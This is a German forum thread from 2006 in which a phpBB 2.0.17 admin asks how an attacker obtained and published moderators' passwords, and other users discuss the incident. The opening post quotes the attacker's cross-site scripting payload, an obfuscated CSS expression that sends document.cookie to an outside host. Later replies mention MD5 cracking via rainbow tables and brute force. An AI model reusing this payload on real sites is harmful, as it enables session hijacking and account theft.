Seite 1 von 3
Gehackt + Passwoerter ausgelesen! Wie?
Verfasst: 19.01.2006 14:32
von daruler
Hallo,
mein 2.0.17 phpbb wurde gestern gehackt (nichts zesrtoert, aber Chaos angerichtet), wobei auch alle Passwoerter der User veroeffentlicht sind (unter andem auch mein eigenes!). Nun, meine Fragen, wie kam der Hacker an die Passwoerter ran, wenn nicht mal ich als Admin darauf Zugriff habe.
Hier Statements des Hackers:
die vulnerability habe ich ich in 4 tagen analyse selber gefunden, das entsprechende exploit selber gescripted. das dürfte somit die weltweit erste vulnerabilty sein, die ein 2.0.17 board effizient und unabhängig von umgebungsvariablen angreift. ich könnte die lücke
publishen, das wär sicher dickes fame aus der community, werd ich aber aus bestimmten gründen nicht machen.
wie ich an die admin rechte komme:
indem ich einen overflow in einer
config datei ausgelöst habe, der es
mir erlaubte code einzuschleusen.
Interessiert mich halt nur wegen der PWs.
Von einem anderen Beteiligten (Mod) hat sich die Sache so abgespielt:
soviel ich weiß hat [Hacker] [meine] hashes über ne pm durch javascript auf seinen webspace kopiert, hat dann mit nem md5(oderso) decoder unser all pw´s entschlüsselt und sie dann in der newsbar (die ich sofort gelöscht hatte, was aber nur zum entzug meiner rechte geführt hat) veröffentlicht.
Zu der angesprochenen PM: Sie enthielt ein Bild mit diesem Code eingefuegt:
Code: Alles auswählen
<B C=">" ''style='font-size:0;color:#EFEFEF'style='top :expression(eval(this.sss));'sss=`i=new/**/Image( );i.src='http://mouze.org/bin/c.php?c='+document .cookie;this.sss=null`style='font-size:0; X="<B ">'</B>
MD5 Decoder? So leicht geht es also?
Was sagt ihr zu der ganzen Sache?
PS: Bitte keine Comments, dass ich auf die letzte Ver. upgraden soll...werde ich demnaechst machen.
Re: Gehackt + Passwoerter ausgelesen! Wie?
Verfasst: 19.01.2006 14:47
von DerGonzo
daruler hat geschrieben:Hallo,
mein 2.0.17 phpbb wurde gestern gehackt [...] Was sagt ihr zu der ganzen Sache?
Die Software ist inzwischen 2 Versionen weiter (2.0.19), jedesmal wurden dabei Sicherheitslöcher geschlossen und damit gleichzeitig die Schwachstellen veröffentlicht.
Warum lädtst Du SkriptKiddis und Hacker ein, indem Du eine Version deren Schwachstellen öffentlich bekannt sind nicht updatest?
Tut mir leid, wenn ich das so sage, aber eigentlich hast Du es nicht anders verdient. Wenn Du auf die aktuelle Version geupdatet hättest und es dann passiert wäre, dann hättest Du mein vollstes Mitleid - so kann ich leider nur kopfschüttelnd sagen "selbst schuld" (Sorry!)...
Das mit den Paßwörtern ist ne äußerst üble Sache und wenn Du die e-mails aller User hast, solltest Du sie schnellstmöglich anschreiben und sie auffordern, alle gleichen Paßwörter sofort zu ändern (viele nutzen ja dummerweise ein Paßwort mehrmals oder nach einem einfachen Schema).
Wie die Paßwörter verschlüsselt sind ist kein Geheimnis, aber wir alle sollten in eigenem Interesse nicht zuviel über die Möglichkeiten dazu veröffentlichen.
Ich wünsche Dir trotzdem, daß Du es schnell wieder in den Griff bekommst!
Schönen Gruß,
DerGonzo!
Verfasst: 19.01.2006 15:03
von daruler
Lieber DerGonzo,
hast wohl mein Post nicht bis zum Ende durchgelesen
Zerstoert wurde nichts, nur die PWs veroeffentlicht...
Frage steht immer noch ->
Wie konnte der Hacker die Passwoerter auslesen?
Verfasst: 19.01.2006 15:21
von larsneo
hat die liste alle benutzer beinhaltet oder haben eventuell alle, deren kennwort später veröffentlicht wurde vorher eine PM bekommen bzw. einen bestimmten beitrag mit bbcode-inhalt gelesen?
wie war die liste sortiert?
Verfasst: 19.01.2006 15:33
von daruler
Die Liste hat nicht alle Passwoerter enthalten, sondern nur die der Mods und wurde auch manuell erstellt, da im Format:
User : Password
Die Mods haben keine PM erhalten.
Verfasst: 19.01.2006 15:48
von Wissler
Sehe ich das richtig, dass der Hacker das(den?) Cookie ausgelesen hat und als URL Parameter zu einer Webseite weitergeleitet hat?
Verfasst: 19.01.2006 15:55
von daruler
Ja.
Verfasst: 19.01.2006 16:01
von larsneo
für einzelne kennwörter kommen ja durchaus bruteforce/dictionary angriffe in frage (wenn sie nicht allzu schwer sind), bei einer grösseren anzahl über die rainbow tables ala
http://www.rainbowcrack-online.com
ich gehe aber erst einmal davon aus, dass userinteraktion dafür notwendig war, d.h. auf jeden fall die anzeige eines postings/einer PM mit dem entsprechenden bbcode exploit.
Verfasst: 19.01.2006 16:06
von daruler
larsneo hat geschrieben:
ich gehe aber erst einmal davon aus, dass userinteraktion dafür notwendig war, d.h. auf jeden fall die anzeige eines postings/einer PM mit dem entsprechenden bbcode exploit.
Auch wenn er irgendwie in meinen Account reingekommen ist, wie kommt er dann an das PW ran?
Bruteforce waere eine Moeglichkeit, aber dauert doch viel zu lange bei ca. 10 Passwoertern.
Und wie gesagt, die anderen PW-Opfer erhielten keine PM...
Verfasst: 19.01.2006 16:07
von Wissler
larsneo hat geschrieben:
ich gehe aber erst einmal davon aus, dass userinteraktion dafür notwendig war, d.h. auf jeden fall die anzeige eines postings/einer PM mit dem entsprechenden bbcode exploit.
Geht es hier um BBCode oder HTML Code (+ javascript)?
Eher um HTML, wenn ich mir den Code oben ansehe.